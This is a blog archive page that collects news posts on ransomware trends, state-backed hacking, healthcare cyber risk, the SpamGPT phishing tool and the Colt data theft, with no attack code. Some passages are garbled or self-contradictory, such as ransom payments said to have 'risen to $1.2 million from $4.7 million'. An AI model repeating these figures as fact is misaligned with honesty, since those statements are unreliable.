Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label ransomware attacks. Show all posts
Threat Intelligence
Cybercrime Ecosystem Cybersecurity Threats Data Breach European Cybersecurity Malware As A Service Network Security ransomware attacks State-Sponsored Attacks Threat Intelligence

Europe struggles with record-breaking spike in ransomware attacks

 


Europe is increasingly being targeted by ransomware groups, driving attacks to unprecedented levels as criminal operations become more industrialised and sophisticated. Threat actors have established themselves in this region as a prime hunting ground, and are now relying on a growing ecosystem of underground marketplaces that sell everything from Malware-as-a-Service subscriptions to stolen network access and turnkey phishing kits to Malware-as-a-Service subscriptions. 

New findings from CrowdStrike's 2025 European Threat Landscape Report reveal that nearly 22 per cent of all ransomware and extortion incidents that occurred globally this year have involved European organisations. Accordingly, European organizations are more likely than those in Asia-Pacific to be targeted by cybercriminals than those in North America, placing them second only to North America. 

According to these statistics, there is a troubling shift affecting Europe's public and private networks. An increasing threat model is being used by cybercriminals on the continent that makes it easier, cheaper, and quicker to attack their victims. This leaves thousands of victims of attacks increasingly sophisticated and financially motivated across the continent. 

Throughout CrowdStrike's latest analysis, a clear picture emerges of just how heavily Europeans have been affected by ransomware and extortion attacks, with the continent managing to absorb over 22% of all global extortion and ransomware attacks. As stated in the report, the UK, Germany, France, Italy, and Spain are the most frequently targeted nations. It also notes that dedicated leak sites linked to European victims have increased by nearly 13% on an annual basis, a trend driven by groups such as Scattered Spider, a group that has shortened its attack-to-deployment window to a mere 24 hours from when the attack started. 

According to the study, companies in the manufacturing, professional services, technology, industrial, engineering and retail industries are still the most heavily pursued sectors, as prominent gangs such as Akira, LockBit, RansomHub, INC, Lynx, and Sinobi continue to dominate the landscape, making big game hunting tactics, aimed at high-value enterprises, remain prevalent and have intensified throughout the continent as well. 

It has been suggested in the study that because of the wide and lucrative corporate base of Europe, the complex regulatory and legal structure, and the geopolitical motivations of some threat actors, the region is a target for well-funded e-crime operations that are well-resourced. State-aligned threat activity continues to add an element of volatility to the already troubled cyber landscape of Europe.

In the past two years, Russian operators have intensified their operations against Ukraine, combining credential phishing with intelligence gathering and disrupting attacks targeted at the power grid, the government, the military, the energy grid, the telecommunications grid, the utility grid, and so forth. The North Koreans have, at the same time, expanded their reach to Europe, attacking defence, diplomatic, and financial institutions in operations that fuse classic espionage with cryptocurrency theft to finance their strategic projects. 

Moreover, Chinese state-sponsored actors have been extorting valuable intellectual property from industries across eleven nations by exploiting cloud environments and software supply chains to siphon intellectual property from the nation that enables them to expand their footprint. 

A number of these operations have demonstrated a sustained commitment to biotechnology and healthcare, while Vixen Panda is now considered one of the most persistent threats to European government and defence organisations, emphasising the degree to which state-backed intrusion campaigns are increasing the region's risk of infection.

There has been a dramatic acceleration in the speed at which ransomware attacks are being carried out in Europe, with CrowdStrike noting that groups such as Scattered Spider have reduced their ransomware deployment cycles to unprecedented levels, which has driven up the levels of infection. Through the group's efforts, the time between an initial intrusion and full encryption has been reduced from 35.5 hours in 2024 to roughly 24 hours by mid-2025, meaning that defenders are likely to have fewer chances to detect or contain intrusions. 

Despite being actively under investigation by law enforcement agencies, eCrime actors based in Western countries, like the United States and the United Kingdom, are developing resilient criminal networks despite active scrutiny by law enforcement. The arrest of four individuals recently by the National Crime Agency in connection with attacks on major retailers, as well as the rearrest of the four individuals for involvement in a breach at Transport for London, underscores the persistence of these groups despite coordinated enforcement efforts. 

In addition to this rapid operational tempo, cybercrime has also been transformed into a commodity-driven industry as a result of a thriving underground economy. The Russian- and English-speaking forums, together with encrypted messaging platforms, offer threat actors the opportunity to exchange access to tools, access points, and operational support with the efficiency of commercial storefronts. 

A total of 260 initial access brokers were seen by investigators during the review period, advertising entry points into more than 1,400 European organizations during the review period. This effectively outsourced the initial stages of a breach to outside sources. Through subscription or affiliate models of malware-as-a-service, companies can offer ready-made loaders, stealers, and financial malware as a service, further lowering the barrier to entry. 

It has been noted that even after major disruptions by law enforcement, including the seizure of prominent forums, many operators have continued to trade without interruption, thanks to safe-haven jurisdictions and established networks of trustworthiness. Aside from eCrime, the report highlights an increasingly complex threat environment caused by state-sponsored actors such as Russia, China, North Korea and Iran. 

Russian actors are concentrating their efforts on Ukraine, committing credential-phishing attacks, obtaining intelligence, and undertaking destructive activities targeting the military, government, energy, telecommunications, and utility sectors, and simultaneously conducting extensive espionage across NATO member countries.

For the purpose of providing plausible deniability, groups tied to Moscow have conducted extensive phishing campaigns, set up hundreds of spoofed domains, and even recruited "throwaway agents" through Telegram to carry out sabotage operations. As Iranian groups continued to conduct hack-and-leak, phishing, and DDoS attacks, often masking state intent behind hacktivist personas, their hack-and-leak campaigns branched into the UK, Germany, and the Netherlands, and they stepped up their efforts. 

With these converging nation-state operations, European institutions have been put under increased strategic pressure, adding an element of geopolitical complexity to an already overloaded cyber-defence environment. It is clear from the findings that for Europe to navigate this escalating threat landscape, a more unified and forward-leaning security posture is urgently needed. According to experts, traditional perimeter defences and slow incident response models are no longer adequate to deal with actors operating at an industrial speed, due to the rapid pace of technology. 

Companies need to share regional intelligence, invest in continuous monitoring, and adopt AI-driven detection capabilities in order to narrow the attackers' widening advantage. Keeping up with the innovation and sophistication of criminal and state-backed adversaries is a difficult task for any organisation, but for organisations that fail to modernise their defences, they run the risk of being left defenceless in an increasingly unforgiving digital battlefield.
Read more »
State-backed criminal groups
cyber attack News ransomware attacks State-backed criminal groups

Ransomware Surge Poses Geopolitical and Economic Risks, Warns Joint Cybersecurity Report

 

A new joint report released this week by Northwave Cyber Security and Marsh, a division of Marsh McLennan, warns that ransomware attacks targeting small and medium-sized businesses have sharply increased, creating serious geopolitical, economic, and national security concerns. Northwave Cyber Security, a leading European cyber resilience firm, and Marsh, one of the world’s largest insurance brokers and risk advisers, analyzed thousands of cyber incidents across Europe and Israel to reveal how ransomware threats are turning into a structured global industry. 

The report finds that many ransomware operators, often linked to Russia, Iran, North Korea, and China, have intensified their attacks on small and mid-sized businesses that form the backbone of Western economies. Instead of focusing only on large corporations or government agencies, these groups are increasingly targeting vulnerable firms in sectors such as IT services, retail, logistics, and construction. 

Peter Teishev, head of the Special Risks Department at Marsh Israel, said the threat landscape has changed significantly. “As ransomware attacks become more sophisticated and decentralized, organizations must shift from responding after incidents to building proactive defense strategies,” he explained. 

He added that Israel has faced particularly high levels of cyberattacks over the past two years, making preparedness a national priority. The report estimates that global ransom payments reached nearly €700 million in 2024, with the average ransom demand standing at €172,000, which equals about 2 percent of a company’s annual revenue. 

In Europe, ransomware incidents increased by 34 percent in the first half of 2025 compared with the same period in 2024. Northwave and Marsh attribute this rapid growth to the rise of Ransomware-as-a-Service (RaaS) models, which allow criminal groups to rent out their hacking tools to others, turning ransomware into a profitable business. 

When authorities disrupt such groups, they often split and rebrand, continuing their activities under new identities. Recent attacks in Israel highlight the geopolitical aspects of ransomware. The Israel National Cyber Directorate (INCD) recently warned of a wave of intrusions against IT service providers, likely linked to Iran. 

One major incident targeted Shamir Medical Center in Tzrifin, where hackers leaked sensitive patient emails. Although an Eastern European ransomware group initially claimed responsibility, Israeli investigators later traced the attack to Iranian actors. 

Cyber experts say this collaboration between state-sponsored hackers and criminal groups shows how ransomware is now used as a tool of hybrid warfare to disrupt healthcare, energy, and transport systems for political purposes. 

The report also discusses divisions among hacker networks following Russia’s invasion of Ukraine. Some ransomware groups sided with Moscow and joined state-backed operations against NATO and EU countries. Others opposed this alignment, which led to the breakup of the infamous Conti Group. 

The exposure of more than 60,000 internal chat logs in what became known as ContiLeaks revealed the internal workings of the ransomware industry and forced several groups to reorganize under new names. Even with these internal divisions, ransomware operations have become more competitive and unpredictable. 

According to Marsh and Northwave, this has made it harder to anticipate their next moves. At the same time, cyber insurance prices fell globally by about 12 percent in the last quarter, making protection more accessible for many organizations. 

The report concludes that ransomware is no longer only a criminal enterprise but also an instrument of global power politics that can undermine economic stability and national security. As Teishev summarized, “The threat is growing, but so is the ability to prepare. The next phase of cybersecurity will focus not on recovery but on resilience.”
Read more »
VPN vulnerabilities
Akira Ransomware APAC Cybercrime cyber resilience Cybersecurity Threats Data Breach Network Security ransomware attacks SonicWall Exploit VPN vulnerabilities

Growing VPN Exploits Trigger Fresh Ransomware Crisis in APAC


 

Despite the growing cyber risk landscape in Asia-Pacific, ransomware operations continue to tighten their grip on India and the broader region, as threat actors more often seek to exploit network vulnerabilities and target critical sectors in order to get a foothold in the region. 

It is essential to note that Cyble's Monthly Threat Landscape Report for July 2025 highlights a concerning trend: cybercriminals are no longer merely encrypting systems for ransom; they are systematically extracting sensitive information, selling network access, and exposing victims to the public in underground marketplaces. 

In recent weeks, India has been a focal point of this escalation, with a string of damaging breaches taking place across a number of key industries. Recently, the Warlock ransomware group released sensitive information concerning a domestic manufacturing company. This information included employee records, financial reports, and internal HR files. Parallel to this, two Indian companies – a technology consulting firm and a SaaS provider – have been found posting stolen data on dark web forums that revealed information on customers, payment credentials, and server usage logs. 

Further compounding the threat, the report claims that credentials granting administrative control over an Indian telecommunications provider’s infrastructure were being sold for an estimated US$35,000 as a way of monetizing network intrusions, highlighting the increasing monetization of network hacking. 

Throughout the region, Thailand, Japan, and Singapore are the most targeted nations for ransomware, followed by India and the Philippines, with manufacturing, government, and critical infrastructure proving to be the most targeted sectors. As the region's digital volatility continues, the pro-India hacktivist group Team Pelican Hackers has been claiming responsibility for hacking multiple Pakistani institutions and leaking sensitive academic data and administrative data related to research projects, which demonstrates that cyber-crime is going beyond financial motives in order to serve as a form of geopolitical signaling in the region. 

Security experts across the region are warning about renewed exploitation of SonicWall devices by threat actors linked to the Akira ransomware group among a growing number of ransomware incidents that have swept across the region. Since the resurgence of Akira's activity occurred in late July 2025, there has been a noticeable increase in intrusions leveraging SonicWall appliances as entry points. Rapid7 researchers have documented this increase.

An attacker, according to the firm, is exploiting a critical vulnerability that dates back a year—identified as CVE-2024-40766 with a CVSS score of 9.3—that is linked to a vulnerability in the SSL VPN configuration on the device. It is clear that this issue, which led to local user passwords persisting rather than being reset after migration, has provided cybercriminals with a convenient way to compromise network defenses. 

It was SonicWall who acknowledged the targeted activity, and confirmed that malicious actors were attempting to gain unauthorized access to the network using brute force. According to the company, administrators should activate Botnet Filtering for the purpose of blocking known malicious IP addresses as well as enforce strict Account Lockout policies to take immediate measures. As ransomware campaigns that exploit VPN vulnerabilities continue to increase, proactive security hygiene is becoming increasingly important. 

The increasing cybercrime challenges in the Asia-Pacific region are being exacerbated by recent findings from Barracuda's SOC Threat Radar Report, which indicate a significant increase in attacks exploiting vulnerabilities in VPN infrastructures and Microsoft 365 accounts. Throughout the study, threat actors are becoming increasingly stealthy and adopting Python-based scripts to avoid detection and maintain persistence within targeted networks in order to evade detection. 

It has been determined that the Akira ransomware syndicate has increased its operations significantly, compromising outdated or unpatched systems rapidly, leading to significant losses for the syndicate. A number of intrusions have been traced back to exploitation of a known flaw in SonicWall VPN appliances — CVE-2024-40766 — that allows attackers to manipulate legacy credentials that haven’t been reset after migration as a result of this flaw. 

A month ago, there was a patch released which addressed the issue. However, many organizations across the APAC region have yet to implement corrective measures, leaving them vulnerable to renewed exploitation in the coming months. In multiple instances, Akira operators have been observed intercepting one-time passwords and generating valid session tokens using previously stolen credentials, effectively bypassing multi-factor authentication protocols, even on patched networks. 

In order to achieve such a level of sophistication, the group often deploys legitimate remote monitoring and management tools in order to disable security software, wipe backups, and obstruct remediation attempts, allowing the group to effectively infiltrate systems without being detected. There has been a sustained outbreak of such attacks in Australia and other Asian countries, which indicates how lapses in patch management, the use of legacy accounts, and the unrotation of high-privilege credentials continue to amplify risk exposure, according to security researchers. 

There is no doubt that a prompt application of patches, a rigorous password reset, and a strict credential management regime are crucial defenses against ransomware threats as they evolve. There is no doubt that manufacturing is one of the most frequently targeted industries in the Asia-Pacific region, as more than 40 percent of all reported cyber incidents have been related to manufacturing industries. 

Several researchers attribute this sustained attention to the sector's intricate supply chains, its dependence on outdated technologies, and the high value of proprietary data and intellectual property that resides within operational networks, which makes it a target for cybercriminals. It has been common for attackers to exploit weak server configurations, steal credentials, and deploy ransomware to disrupt production and gain financial gain by exploiting weak server configurations. 

Approximately 16 percent of observed attacks occurred in the financial sector and insurance industry, with adversaries infiltrating high-value systems through sophisticated phishing campaigns and malware. The purpose of these intrusions was not only to steal sensitive information, such as customer and payment information, but also to maintain persistent access for prolonged reconnaissance. 

Among the targeted entities, the transportation industry, which accounts for around 11 percent of all companies targeted, suffered from an increase in attacks intended to disrupt logistics and operational continuity as a consequence of its reliance on remote connectivity and third-party digital infrastructure as a consequence of its heavy reliance on remote connectivity. 

In the wider APAC context, cybercriminals are increasingly pursuing both operational and financial goals in these attacks, aiming to disrupt as well as monetize. It is still very common for threats actors to steal trade secrets, customer records, and confidential enterprise information, making data theft one of the most common outcomes of these attacks. 

Despite the fact that credential harvesting is often facilitated by malware that steals information from compromised systems, this method of extorting continues to enable subsequent breaches and lateral movements within compromised systems. Furthermore, the extortion-based operation has evolved, with many adversaries now turning to non-encrypting extortion schemes for coercing victims, rather than using ransomware encryption to coerce victims, emphasizing the change in cyber threats within the region. 

Several experts have stressed that there is no substitute for a multilayered and intelligence-driven approach to security in the Asia-Pacific region that goes beyond conventional security frameworks in order to defend against the increasing tide of ransomware. Static defenses are not sufficient in an era in which threat actors have evolved their tactics in a speed and precision that is unprecedented in history. 

A defence posture that is based on intelligence must be adopted by organizations, continuously monitoring the tactics, techniques, and procedures used by ransomware operators and initial access brokers in order to identify potential intrusions before they arise. As modern "sprinter" ransomware campaigns have been exploiting vulnerabilities within hours of public disclosure, agile patch management is a critical part of this approach.

There is no doubt that timely identification of vulnerable systems and remediation of those vulnerabilities, as well as close collaboration with third party vendors and suppliers to ensure consistency in patching, are critical components of an effective cyber hygiene program. It is equally important to take human factors into consideration. 

The most common attack vector that continues to be exploited is social engineering. Therefore, it is important to conduct continuous awareness training tailored to employees who are in sensitive or high-privilege roles, such as IT and helpdesk workers, to reduce the potential for compromise. Furthermore, security leaders advise organizations to adopt a breach-ready mindset, which means accepting the possibility of a breach of even the most advanced defenses.

If an attack occurs, containing damage and ensuring continuity of operations can be achieved through the use of network segmentation, immutable data backups, and a rigorously tested incident response plan to strengthen resilience. Using actionable intelligence combined with proactive risk management, as well as developing a culture of security awareness, APAC enterprises can be better prepared to cope with the relentless wave of ransomware threats that continue to shape the digital threat landscape and recover from them. 

A defining moment in the Asia-Pacific cybersecurity landscape is the current refinement of ransomware groups' tactics as they continue to exploit every weakness in enterprise defenses. Those recent incidents of cyber-attacks using VPNs and data exfiltration incidents should serve as a reminder that cyber resilience is no longer just an ambition; it is a business imperative as well. Organizations are being encouraged to shift away from reactive patching and adopt a culture that emphasizes visibility, adaptability, and intelligence sharing as the keys to continuous security maturity. 

Collaboration between government, the private sector, and the cybersecurity community can make a significant contribution to the development of early warning systems and collective response abilities. A number of measures can help organizations detect threats more efficiently, enforce zero-trust architectures, and conduct regular penetration tests, which will help them identify any vulnerabilities before adversaries take advantage of them. 

Increasingly, digital transformation is accelerating across industries, which makes the importance of integrating security by design—from supply chains to cloud environments—more pressing than ever before. Cybersecurity can be treated by APAC organizations as an enabler rather than as a compliance exercise, which is important since such enterprises are able to not only mitigate risks, but also build digital trust and operational resilience during an age in which ransomware threats are persistent and sophisticated.
Read more »
ransomware attacks
AI in cybersecurity Cyber Attacks Cyber Extortion Microsoft Digital Defense Report nation-state hackers ransomware attacks

Microsoft Warns: Over Half of Cyberattacks Driven by Extortion and Ransomware, Legacy Security Failing to Keep Up

 


More than 50% of cyberattacks are now motivated by extortion and ransomware, according to Microsoft’s latest Digital Defense Report. The tech giant revealed that outdated security systems are no longer capable of defending against today’s evolving cyber threats.

In its sixth annual report, Microsoft highlighted that around 80% of the cyber incidents its security teams investigated last year were financially motivated.

"That’s at least 52% of incidents fueled by financial gain, while attacks focused solely on espionage made up just 4%," said Amy Hogan-Burney, CVP for Customer Security and Trust at Microsoft.

She added, "Nation-state threats remain a serious and persistent threat, but most of the immediate attacks organizations face today come from opportunistic criminals looking to make a profit."

The report noted that critical public sectors, including hospitals and local governments, are prime targets. These institutions often handle highly sensitive information but operate with limited cybersecurity resources and response capabilities. In many cases, healthcare and other essential services are more likely to pay ransoms due to the critical nature of their operations.

Although nation-state-driven attacks account for a smaller share of total incidents, their volume is steadily increasing. Microsoft’s findings show that China continues its aggressive campaigns across industries to steal sensitive data, using covert systems and exploiting internet vulnerabilities to avoid detection.

Iran has widened its scope, targeting sectors from the Middle East to North America, including shipping and logistics companies in Europe and the Persian Gulf to gain access to valuable commercial data.

Meanwhile, Russia has extended its operations beyond Ukraine, focusing on small businesses in pro-Ukraine countries, perceiving them as softer targets compared to larger corporations.

Microsoft also identified North Korea as a major concern for both espionage and revenue-driven cyber operations. Thousands of North Korean IT workers are reportedly employed remotely by global companies, funneling their salaries back to the regime. When exposed, some of these operatives have shifted to extortion tactics.

"The cyber threats posed by nation-states are becoming more expansive and unpredictable," Hogan-Burney warned. "In addition, the shift by at least some nation-state actors to further leveraging the cybercriminal ecosystem will make attribution even more complicated."

She stressed the importance of collaboration: "This underscores the need for organizations to stay abreast of the threats to their industries and work with both industry peers and governments to confront the threats posed by nation-state actors."

Microsoft’s report also underscored how artificial intelligence and automation have empowered cybercriminals, even those with minimal expertise, to execute more complex attacks. AI tools are being used to develop malware faster, generate convincing fake content, and enhance phishing and ransomware campaigns.

More than 97% of identity attacks are now password-related, with a 32% surge in the first half of 2025 alone. Attackers commonly exploit leaked credentials and use large-scale password guessing.

"However, credential leaks aren’t the only place where attackers can obtain credentials," Hogan-Burney explained. "This year, we saw a surge in the use of infostealer malware by cyber criminals. Infostealers can secretly gather credentials and information about your online accounts, like browser session tokens, at scale."

She added, "Cyber criminals can then buy this stolen information on cyber crime forums, making it easy for anyone to access accounts for purposes such as the delivery of ransomware."

The report concludes by urging governments to establish stronger frameworks to ensure credible consequences for cyber activities that breach international laws and norms.


Read more »
ransomware attacks
Clinical Safety cyber resilience cybersecurity in healthcare Data Breach Digital Health Threats Health ISAC Medical Device Security patient data protection ransomware attacks

Cyber Risks Emerge as a Direct Threat to Clinical Care

 


Even though almost every aspect of modern medicine is supported by digital infrastructure, the healthcare sector finds itself at the epicentre of an escalating cybersecurity crisis at the same time. Cyberattacks have now evolved from being just a financial or corporate problem to a serious clinical concern, causing patients' safety to be directly put at risk as well as disrupting essential healthcare. 

With the increasing use of interconnected systems in hospitals and diagnostic equipment, as well as cloud-based patient records, the attack surface on medical institutions is expanding, making them increasingly susceptible to ransomware and data breaches posed by the increasing use of interconnected systems. 

The frequency and sophistication of such attacks have skyrocketed in recent years, and the number of attacks has almost doubled compared to 2023, when the number of ransomware attacks in the United States alone climbed by a staggering 128 per cent in the same year. As far as data loss and financial damage are concerned, the consequences of these breaches do not stop there. 

There are estimates of healthcare organisations losing up to $900,000 per day because of operational outages linked to ransomware, which excludes the millions—or billions—that are spent on ransom payments. In IBM's 2024 Cost of a Data Breach Report, healthcare was ranked as the highest cost per incident in the world, with an average cost of $9.8 million. This was significantly more than the $6.1 million average cost per incident within the financial sector. 

In spite of this fact, the most devastating toll of cyberattacks is not in currency, but rather in the lives of victims. Studies indicate that cyberattacks have resulted in delayed procedures, compromised care delivery, and, in some cases, increased mortality rates of patients. There has been a troubling increase from the previous year, since 71 per cent of healthcare organisations affected by cyber incidents reported negative patient outcomes due to service disruptions in 2023. 

With the rapid growth of digital transformation in healthcare, the line between data security and clinical safety is fast disappearing - making cybersecurity an urgent issue of patient survival rather than mere IT resilience as digital transformation continues to redefine healthcare. With cyber threats growing more sophisticated, healthcare is experiencing a troubling convergence of digital vulnerability and human consequences that is becoming more and more troubling. 

There was once a time in healthcare when cybersecurity was viewed solely as a matter of data protection; however, today, it has become an integral part of patient safety and wellbeing, which is why experts are predicting that the threat of cybersecurity attacks will escalate significantly by the year 2025, with hospitals and health systems facing increasing financial losses as well as the threat of escalating risks. 

Recent reports have highlighted hospitals being incapacitated by ransomware attacks, which have compromised critical care, eroded public trust, and left healthcare staff unable to provide care. "Patient safety is inseparable from cyber safety," emphasised Ryan Witt, Proofpoint's healthcare leader, emphasising that when digital systems fail, life-saving care can be compromised. Statistics behind these incidents reveal a frightening reality. 

A study found that nearly seventy-eight per cent of healthcare organisations experienced disruptions in patient care as a result of ransomware, email compromise, cloud infiltration, and supply chain attacks. More than half of these patients experienced extended stays in the hospital or medical complications, while almost a third saw a rise in death rates. 

Financial figures often overshadow the human toll of a major attack: although the average cost has fallen to $3.9 million from $4.7 million, ransom payments have risen to $1.2 million from $4.7 million. It is important to remember that there are no monetary figures that can fully capture the true impacts of systems that go dark-missing diagnoses, delays in surgery, and the lives put at risk of clinicians, nurses, and technicians. 

Considering that time and precision are synonymous with survival in the healthcare sector, it has become clear that the encroachment of cybercrime is more than merely a technology nuisance and has become a profound threat to the very concept of care itself. Health Information Sharing and Analysis Centre (Health-ISAC) continues to play an important role in strengthening the industry's defences amidst increasing global cyber threats targeting the healthcare sector. 

It serves as an important nexus for collaboration, intelligence sharing, and real-time threat mitigation across healthcare networks worldwide. Health-ISAC is a non-profit organisation run by its members. A vital resource for safeguarding both digital and physical health infrastructures, Health-ISAC has disseminated actionable intelligence and strengthened organizational resilience through the distribution of actionable intelligence and strengthening of organisational resilience. 

It has recently been reported that the organisation has identified several security threats, including critical vulnerabilities found within Citrix NetScaler ADC, NetScaler Gateway, and Cisco Adaptive Security Appliances (ASA) that could potentially be exploited. Immediately after the identification of these flaws, Health-ISAC issued over a hundred targeted alerts to member institutions in order to minimise the risk of exploitation. 

These vulnerabilities have been exploited by threat actors since then, highlighting how the healthcare sector needs to be monitored continuously and provide rapid response mechanisms. As well as detecting threats, Health-ISAC has also been involved in regulatory alignment, particularly addressing FDA guidance regarding cybersecurity for medical devices that was recently updated. 

Revisions to the quality system considerations and the content of premarket submissions, issued in June 2025, have replaced the earlier version, which was issued in 2023, and incorporate Section VII of the Federal Food, Drug, and Cosmetic Act (FD&C Act). In this section, manufacturers are outlined in detail about their specific compliance obligations, including the use of cybersecurity assurance procedures, Software Bills of Materials (SBOMs), and secure development methods. 

It has also been emphasised by Health-ISAC that there are related regulatory frameworks that will affect AI-enabled medical devices, such as the FDA Quality Management System Regulation, the EU Cyber Resilience Act, and emerging standards such as AI-enabled data providers. In the organisation's latest analysis, the organisation explored how the geopolitical climate has been shifting in the Asia Pacific region, where growing tensions between the Philippines and China, particularly over the Scarborough Shoal, which has now been designated by China as a maritime wildlife refuge, are reshaping regional security. 

The significant investment Australia has made in asymmetric warfare capabilities is a further indication of the interconnectedness between geopolitics and cybersecurity threats. Denise Anderson, President and CEO of Health-ISAC, commented on the organisation's 15-year milestone and stated that the accomplishments of the organisation demonstrate the importance of collective defence and shared responsibility. She added, "Our growth and success are a testament to the power of collaboration and to our members' passion to improve the welfare of patients," she expressed.

"With the emergence of sophisticated threats, a unified defence has never been more needed." In the near future, Health-ISAC plans to strengthen the intelligence sharing capabilities of the organisation, expand its partnerships throughout the world, and continue promoting cybersecurity awareness - all of which will strengthen the organisation's commitment to making healthcare safer and more resilient throughout the world. 

The healthcare landscape is becoming increasingly digitalised, and preserving it will require not only a proactive defence but a coordinated, unified approach as well. As technology and patient care have converged, cybersecurity has become a clinical imperative, one that will require the collaboration of policymakers, hospital administrators, medical device manufacturers, and cybersecurity specialists. 

Various experts highlight that through investment in secure infrastructure, workforce training, and continuous monitoring and assessment of risks, there is no longer an option but instead a necessity to maintain the trust of patients and ensure the continuity of operations. 

There is a significant reduction in vulnerabilities across complex healthcare ecosystems when zero-trust frameworks are implemented, timely software patches are made, and transparent data governance takes place. Moreover, fostering global intelligence-sharing alliances, such as the one promoted by Health-ISAC, can strengthen our collective resilience to emerging cyber threats.

With the sector facing a number of emerging challenges in the future - from ransomware to artificial intelligence-enabled attacks - it is imperative that cyber safety is treated as an integral part of patient safety in order to survive. In addition to protecting data, healthcare delivery is also preserving its most vital mission: saving lives in a world where the next medical emergency could be just as easily caused by malicious code as it would be caused by the hospital.
Read more »
SpamGPT
AI phishing tool Cyber Fraud cybercrime AI email security Phishing Campaigns ransomware attacks SpamGPT

SpamGPT: AI-Powered Phishing Tool Puts Cybersecurity at Risk

 

While most people have heard of ChatGPT, a new threat called SpamGPT is now making headlines. Security researchers at Varonis have discovered that this professional-grade email campaign tool is designed specifically for cybercriminals. The platform, they report, offers “all the conveniences a Fortune 500 marketer might expect, but adapted for cybercrime.”

SpamGPT’s dashboard closely mimics legitimate email marketing software, allowing attackers to plan, schedule, and track large-scale spam and phishing campaigns with minimal effort. By embedding AI-powered features, the tool can craft realistic phishing emails, optimize subject lines, and fine-tune scams—making it accessible even to criminals with little technical background.

"SpamGPT is essentially a CRM for cybercriminals, automating phishing at scale, personalizing attacks with stolen data, and optimizing conversion rates much like a seasoned marketer would. It's also a chilling reminder that threat actors are embracing AI tools just as fast as defenders are," explained Rob Sobers, CMO at Varonis.

The toolkit includes built-in modules for SMTP/IMAP configuration, inbox monitoring, and deliverability testing. Attackers can upload stolen SMTP credentials, verify them through an integrated checker, and rotate multiple servers to avoid detection. IMAP monitoring further allows criminals to track replies, bounces, and email placement.

A real-time inbox check feature sends test emails and confirms whether they land in inboxes or spam folders. Combined with campaign analytics, SpamGPT functions much like a legitimate customer relationship management (CRM) platform—but is weaponized for phishing, ransomware, and other cyberattacks.

Marketed as a “spam-as-a-service” solution, SpamGPT lowers the skill barrier for cybercrime. Tutorials such as “SMTP cracking mastery” guide users in obtaining or hacking servers, while custom header options make it easier to spoof trusted brands or domains. This means even inexperienced attackers can bypass common email authentication methods and run large-scale campaigns.

Experts warn that the rise of SpamGPT could trigger a surge in phishing, ransomware, and malware attacks. Its ability to slip past spam filters and disguise malicious payloads as legitimate correspondence makes it especially dangerous for both individuals and businesses.

To counter threats like SpamGPT, cybersecurity experts recommend:

  • Enforcing DMARC, SPF, and DKIM to block spoofed emails.

  • Deploying AI-driven phishing detection tools.

  • Maintaining regular backups and malware removal protocols.

  • Implementing multi-factor authentication (MFA) across all accounts.

  • Providing ongoing phishing awareness training for employees.

  • Using network segmentation and least-privilege access controls.

  • Keeping software and security patches updated.

  • Testing and refining incident response plans for rapid recovery.

SpamGPT demonstrates how cybercriminals are harnessing AI to evolve their tactics. As defenses improve, attackers are adapting just as quickly—making vigilance and layered security strategies more critical than ever.

Read more »
Ransomwares
Colt ransomware attack Colt WarLock hackers Customer Data Cyber Attacks Dark Web data stealing Ransom Demand ransomware attacks Ransomware group Ransomwares

Colt Technology Services Confirms Customer Data Theft After Warlock Ransomware Attack



UK-based telecommunications provider Colt Technology Services has confirmed that sensitive customer-related documentation was stolen in a recent ransomware incident. The company initially disclosed on August 12 that it had suffered a cyberattack, but this marks the first confirmation that data exfiltration took place. In its updated advisory, Colt revealed that a criminal group accessed specific files from its systems that may contain customer information and subsequently posted the filenames on dark web forums. 

To assist affected clients, Colt has set up a dedicated call center where customers can request the list of exposed filenames. “We understand that this is concerning for you,” the company stated in its advisory. Notably, Colt also implemented a no-index HTML meta tag on the advisory webpage, ensuring the content would not appear in search engine results. 

The development follows claims from the Warlock ransomware gang, also known as Storm-2603, that they are auctioning one million stolen Colt documents for $200,000 on the Ramp cybercrime marketplace. The group alleges the files contain financial data, customer records, and details of network architecture. 
Cybersecurity experts verified that the Tox ID used in the forum listing matches identifiers seen in the gang’s earlier ransom notes, strengthening the link to Colt’s breach. The Warlock Group, attributed to Chinese threat actors, emerged in March 2025 and initially leveraged leaked LockBit Windows and Babuk VMware ESXi encryptors to launch attacks. Early operations used LockBit-style ransom notes modified with unique Tox IDs to manage negotiations. 

By June, the group rebranded under the name “Warlock Group,” establishing its own negotiation platforms and leak sites to facilitate extortion. Recent intelligence reports, including one from Microsoft, have indicated that the group has been exploiting vulnerabilities in Microsoft SharePoint to gain unauthorized access to corporate networks. Once inside, they deploy ransomware to encrypt data and steal sensitive files for leverage. 

The group’s ransom demands vary significantly, ranging from $450,000 to several million dollars, depending on the target organization and data involved. Colt’s disclosure highlights ongoing challenges faced by enterprises in safeguarding critical infrastructure against sophisticated ransomware actors. Telecommunications companies, which manage vast volumes of sensitive customer and network data, remain particularly attractive targets. 

As threat actors refine their tactics and increasingly combine encryption with data theft, the risks to both organizations and their clients continue to escalate. While Colt has not confirmed whether it plans to engage with the ransomware operators, the company emphasized its focus on mitigating the impact for customers. 

For now, the stolen documents remain for sale on the dark web, and the situation underscores the broader need for enterprises to strengthen resilience against the evolving ransomware landscape.
Read more »
Ransomwares
Advanced Social Engineering Cyber Attacks Data Exfilteration data security Ransom Demands ransom payments ransomware attacks Ransomwares

Ransom Payouts Hit Record Levels Amid Social Engineering and Data Exfiltration Attacks

 

Ransomware payouts surged to unprecedented levels in the second quarter of 2025, driven largely by the rise of highly targeted social engineering schemes. According to new data from Coveware by Veeam, the average ransom payment skyrocketed to $1.13 million, representing a 104% jump compared to the previous quarter. The median ransom also doubled to $400,000, highlighting how even mid-tier victims are now facing significantly higher costs. Analysts attribute this spike to larger organizations paying ransoms in incidents where data was stolen rather than encrypted, marking a significant shift in extortion tactics.  

The study found that data exfiltration has now overtaken file encryption as the primary method of extortion, with 74% of attacks involving theft of sensitive information. Multi-extortion techniques, including delayed release threats, are also on the rise. Bill Siegel, CEO of Coveware by Veeam, described the findings as a pivotal moment for ransomware, explaining that threat actors are no longer focused solely on disrupting backups or locking systems. Instead, they increasingly exploit people, organizational processes, and the reputational value of stolen data. 

